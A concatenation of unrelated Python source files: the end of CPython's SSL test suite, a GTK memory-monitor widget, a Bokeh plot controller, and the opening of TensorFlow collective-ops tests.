self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client waits until the server is set up, then performs a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1')
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peer's version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True)
except ssl.SSLError as e:
stats = e
if expected is None and IS_OPENSSL_1_1:
# OpenSSL 1.1.0 raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
            # SIGNED_CERTFILE2 (common name 'fakehostname') was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
alg1 = "AES256"
alg2 = "AES-256"
else:
client_context.set_ciphers("AES:3DES")
server_context.set_ciphers("3DES")
alg1 = "3DES"
alg2 = "DES-CBC3"
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
                if alg1 not in name.split("-") and alg2 not in name:
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
# first connection without session
stats = server_params_test(client_context, server_context)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context, session=session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context, session=session)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
context2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context2.verify_mode = ssl.CERT_REQUIRED
context2.load_verify_locations(CERTFILE)
context2.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with context.wrap_socket(socket.socket()) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with context2.wrap_socket(socket.socket()) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
r'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SimpleBackgroundTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
gui.py
|
import cairo
import gi
import threading
import time
gi.require_version('Gtk', '3.0')
gi.require_version('Gdk', '3.0')
from gi.repository import Gtk
from gi.repository import Gdk
from gi.repository.GdkPixbuf import Pixbuf, InterpType
from sand.gui_module import GUIComponent
from sand.modules.memory.sensor import MemorySensor
import os
import pkg_resources
class SandMemoryGui(GUIComponent):
def __init__(self, configuration="configuration.yaml"):
GUIComponent.__init__(self, "{}/{}".format(__package__, configuration))
self._label_memory = []
self._memory_sensor = MemorySensor()
self._memory_information = None
self.current_drawing_offset = self.configuration["start-drawing-offset"]
self._module_color = "#{}".format(self.configuration["module-color"])
self._thread_refresh = None
def create_icon(self):
label_description = Gtk.Label()
label_description.set_markup("<span foreground='{}'><i><big><b>{}</b></big></i></span>".format(self._module_color, self.configuration["description"]))
self.layout.put(label_description, self.configuration["description-position-x"], self.configuration["description-position-y"])
image = Gtk.Image()
icon_filepath = pkg_resources.resource_filename(__name__, self.configuration["icon-filename"])
pixbuf = Pixbuf.new_from_file(icon_filepath)
image.set_from_pixbuf(pixbuf.scale_simple(self.configuration["icon-dimension-x"],
self.configuration["icon-dimension-y"], InterpType.BILINEAR))
self.layout.put(image, self.configuration["icon-position-x"], self.configuration["icon-position-y"])
def build(self):
self.create_icon()
self._build_memory_labels()
self._thread_refresh = threading.Thread(target=self.refresh, args=())
        self._thread_refresh.daemon = True
self._thread_refresh.start()
def _build_memory_labels(self):
self._memory_information = self._memory_sensor.read()
for element in self.configuration["labels-mapping"]:
label = Gtk.Label()
description = self.configuration["labels-mapping"][element]
label.set_markup("<span foreground='{}'>{}<b>{}</b></span>".format(self._module_color, description, self._memory_information[element]))
self.layout.put(label, 0, self.current_drawing_offset)
self.current_drawing_offset += self.configuration["horizontal-spacing"]
self._label_memory.append(label)
def refresh(self):
while True:
self._memory_information = self._memory_sensor.read()
            for i, element in enumerate(self.configuration["labels-mapping"]):
                description = self.configuration["labels-mapping"][element]
                self._label_memory[i].set_markup("<span foreground='{}'>{}<b>{}</b></span>".format(self._module_color, description, self._memory_information[element]))
time.sleep(self.configuration["refresh-time"])
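# Note (not part of the original project): the class above reads the following
# keys from configuration.yaml. The key names are taken from the attribute
# accesses in this file; every value shown below is purely illustrative.
#
#   description: "RAM"
#   description-position-x: 60
#   description-position-y: 0
#   module-color: "ffffff"
#   icon-filename: "memory.png"
#   icon-dimension-x: 48
#   icon-dimension-y: 48
#   icon-position-x: 0
#   icon-position-y: 0
#   start-drawing-offset: 60
#   horizontal-spacing: 20
#   refresh-time: 2
#   labels-mapping:
#     total: "Total: "
#     used: "Used: "
#     free: "Free: "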
|
controller.py
|
"""This module handles the view and model interactions."""
import time
from bokeh.io import curdoc
from threading import Thread
import view
import model
import computation
doc = curdoc()
LOOP_TIME = 1000
class PlotContainer:
def __init__(self, figure, sources, idx=0):
self.figure = figure
self.sources = sources
self.idx = idx
table_cols = ("x", "lower CI", "upper CI", "mean")
cfg = dict()
sources = model.sources()
v_tabs = view.Plots(sources, cfg)
v_settings = view.Settings(cfg)
v_control = view.Control(cfg)
table_source = model.table_source(True)
v_table = view.Table(table_source)
v_view = view.build_view(v_control.layout,
v_settings.layout,
v_tabs.layout,
v_table.layout)
plots = [PlotContainer(figure, sources, 0)
for figure, sources in zip(v_tabs.plots, sources)]
def start_thread(target):
def wrapper():
        thread = Thread(target=target)
thread.start()
return wrapper
def loopable():
cur_plot = plots[cfg["tab"]]
window = cfg["past_size"] + cfg["future_size"]
return cur_plot.idx < cur_plot.sources.series.shape[0] - window - 1
def main_loop():
if cfg["on_off"] == 0:
step_runs()
def step_all():
while loopable():
step_single(False)
cur_plot = plots[cfg["tab"]]
cur_plot.sources.update()
def step_runs():
sleep_time = (LOOP_TIME-200) / cfg["speed"] / 1000.0
steps = cfg["speed"]
for _ in range(steps):
step_single()
time.sleep(sleep_time)
def step_single(update=True):
cur_plot = plots[cfg["tab"]]
computation.traverse(cur_plot,
cfg["past_size"],
cfg["future_size"],
cfg["ci"],
cfg["zoom"],
update)
cur_plot.idx += 1
cur_plot.sources.update()
table_source.data = cur_plot.sources.table.data
def reset():
plot = plots[cfg["tab"]]
plot.sources.reset()
plot.idx = 0
plot.figure.x_range.start = plot.sources.series.index.min()
plot.figure.x_range.end = plot.sources.series.index.max()
# add callbacks
v_control.step_single.on_click(step_single)
v_control.step_all.on_click(step_all)
v_control.reset.on_click(reset)
doc.add_root(v_view)
doc.title = "Predictive Calls"
curdoc().add_periodic_callback(main_loop, LOOP_TIME)
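# Note (inferred from the reads above, not from the original documentation):
# the shared cfg dict is populated by the view components, and the controller
# consumes these keys:
#   tab         - index of the currently selected plot in `plots`
#   on_off      - 0 while main_loop() should keep calling step_runs()
#   speed       - number of steps performed per loop iteration in step_runs()
#   past_size   - history window size passed to computation.traverse()
#   future_size - forecast window size passed to computation.traverse()
#   ci          - confidence-interval setting passed to computation.traverse()
#   zoom        - zoom setting passed to computation.traverse()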
|
collective_ops_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for V2 Collective Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
from absl.testing import parameterized
from tensorflow.python.compat import v2_compat
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import test_util
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops as _collective_ops
from tensorflow.python.platform import test
class CollectiveOpsV1(object):
all_reduce = _collective_ops.all_reduce
all_gather = _collective_ops.all_gather
class CollectiveOpsV2(object):
@staticmethod
def all_reduce(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_reduce_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def all_gather(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_gather_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
device_combination = (
combinations.combine(device='CPU', communication='RING', required_gpus=0) +
combinations.combine(
device='GPU', communication=['RING', 'NCCL'], required_gpus=2))
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v1', CollectiveOpsV1),
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager'), device_combination))
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
def testGather(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_gather_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_gather_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_gather_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_gather_2devices():
self.assertAllClose(result, [1., 1.], rtol=1e-5, atol=1e-5)
def testInstanceKeyScopedUnderGroupKey(self, collective_ops, device,
communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
dev2 = '/device:%s:2' % device
dev3 = '/device:%s:3' % device
@def_function.function
def run_all_reduce_4devices_same_instance_key():
# Use a common instance key for both groups.
instance_key = 0
# We will create 2 groups each with 2 devices.
group_size = 2
# Group 0 comprises dev0 and dev1.
group0_key = 0
# Group 1 comprises dev2 and dev3.
group1_key = 1
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(1.), group_size, group0_key, instance_key))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(2.), group_size, group0_key, instance_key))
with ops.device(dev2):
collectives.append(
